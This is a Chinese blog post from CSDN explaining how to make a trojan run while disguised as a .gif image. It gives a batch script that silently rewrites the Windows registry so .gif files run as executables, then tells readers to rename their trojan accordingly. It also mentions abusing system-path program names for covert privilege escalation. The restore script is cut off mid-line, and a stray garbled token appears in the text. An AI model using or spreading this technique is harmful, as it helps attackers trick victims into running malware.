php木马伪装成图片,木马伪装图片运行的技巧

本文介绍了一种技巧,通过修改注册表使得.gif等常见图片格式能够被视为可执行文件,从而实现木马的伪装运行。此外,还讨论了利用环境变量的策略,如将木马命名为系统路径中已存在的程序名,达到隐蔽提权的目的。
摘要由CSDN通过智能技术生成

任意文件当做木马来运行

你见过gif、jpg、jpeg、bmp等后缀文件当做木马来运行吗?一个小技巧可以把任意后缀文件当做EXE程序文件来运行。

更改exe为gif:

@echo off

color 1A

ECHO Windows Registry Editor Version 5.00>gif.reg

ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.gif]>>gif.reg

ECHO "Content Type"="application/x-msdownload">>gif.reg

ECHO @="exefile">>gif.reg

regedit /s gif.reg>nul 2>nul

del /s gif.reg>nul 2>nul

这个代码保存成.BAT的文件。

先运行这个BAT文件系统会把.GIF文件来当做应用程序来运行

当然我们的木马后缀要换成.GIF 的,嘻嘻。

J-Wphc!m

恢复gif默认:

@echo off

color 1A

ECHO Windows Registry Editor Version 5.00>gif.reg

ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.gif]>>gif.reg

ECHO "Content Type"="image/gif">>gif.reg

ECHO @="giffile">

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值